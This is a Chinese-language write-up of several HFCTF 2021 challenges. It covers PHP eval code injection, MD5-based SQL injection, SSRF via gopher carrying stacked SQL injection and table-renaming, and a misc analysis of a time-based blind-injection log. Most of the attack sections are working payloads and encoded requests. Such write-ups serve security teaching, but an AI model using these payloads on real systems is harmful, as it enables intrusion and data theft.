虎符2021CTF部分Writeup
WEB
签到
没放提示前,假签到,放提示后,真签到
新闻前几天刚看,说是存在后门,直接找一下当时的新闻和代码
恶意的RCE,利用方式:
直接干一下
命令执行,直接cat /flag即可
unsetme
直接搜索相应代码,获取到题目使用的PHP模板
直接去github上把代码down下来,看一下base.php,直接看一下unset出现的地方
在这里出现了一次eval()函数的调用,结合前后代码,我们如果可控eval达到代码执行的话需要闭合前面的数组和unset,同时注释掉后面的内容
:[]);system("whoami");//
成功执行代码,获取flag
“慢慢做”管理系统
比较有意思的题目,题目描述很重要
根据提示第一步的sql注入需要利用md5进行注入,类似于实验吧的题目。不过这里把实验吧的payload给禁止掉了,我们可以使用另外的一个
username=admin&password=129581926211651571912466741651878684928
进入之后告诉我们需要提交gopher
既然是SSRF,我们直接利用gopher协议打内网进行注入了,在admin.php页面下存在POST表单,构造POST报文
POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
username=admin' or 1=1 #&password=123
替换为gopher的payload,直接用python进行替换
import urllib
test =\
"""POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
username=admin' or 1=1 #&password=123
"""
#huiche
tmp = urllib.quote(test)
new = tmp.replace('%0A','%0D%0A')
result='_'+urllib.quote(new)
#post
#result = '_'+new
common="gopher://127.0.0.1:80/"
print(urllib.quote(common)+result)
构造:
gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252037%250D%250A%250D%250Ausername%253Dadmin%2527%2520or%25201%253D1%2520%2523%2526password%253D123%250D%250A%250D%250A
提交查看结果
发现是以数组的形式将数据输出的,猜测存在堆叠注入,构造payload
gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252045%250D%250A%250D%250Ausername%253Dadmin%2527%253Bshow%2520databases%253B%2523%2526password%253D123%250D%250A%250D%250A
发现存在三种数据库
查看ctf2的数据表
gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252051%250D%250A%250D%250Ausername%253Dadmin%2527%253Buse%2520ctf2%253Bshow%2520tables%253B%2523%2526password%253D123%250D%250A%250D%250A
测试发现select perpare等关键词被过滤,我们可以使用19年强网杯的方式,利用rename,查看数据
POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
username=admin';use ctf2;rename table `fake_admin` to `fake_admin1`;rename table `real_admin_here_do_you_find` to `fake_admin`;#&password=123
gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%2520141%250D%250A%250D%250Ausername%253Dadmin%2527%253Buse%2520ctf2%253Brename%2520table%2520%2560fake_admin%2560%2520to%2520%2560fake_admin1%2560%253Brename%2520table%2520%2560real_admin_here_do_you_find%2560%2520to%2520%2560fake_admin%2560%253B%2523%2526password%253D123%250D%250A%250D%250A
再次使用万能密码查看内容
成功获取到密码,这里要注意审题,题目说提交真-admin的密码,所以我们登陆的用户名是admin,密码是获取到的这个,构造一下
POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
username=admin&password=5fb4e07de914cfc82afb44vbaf402203
gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252056%250D%250A%250D%250Ausername%253Dadmin%2526password%253D5fb4e07de914cfc82afb44vbaf402203%250D%250A%250D%250A
出现cookie和302跳转,我们在构造的http头中添加上cookie,访问flag.php
GET /flag.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=ttmid17emjg67vco1bn5db45l7;
gopher%3A//127.0.0.1%3A80/_GET%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250ACookie%253A%2520PHPSESSID%253Dttmid17emjg67vco1bn5db45l7%253B%250D%250A%250D%250A
成功获取到flag
Misc
你会日志分析吗
比较基础的日志盲注审计,首先看清楚sql语句
基于时间的盲注,如果flag的该位的ascii值是等于号相同的,也就是结果为真时,执行sleep(2)操作,否则不执行,所以思路比较简单,可以看时间变化进行判断,也可以看返回长度为377也可以进行判断,最后取出数据为base64编码数据
ZmxhZ3tZb3VfYXJlX3NvX2dyZWF0eQ==
#flag{You_are_so_great}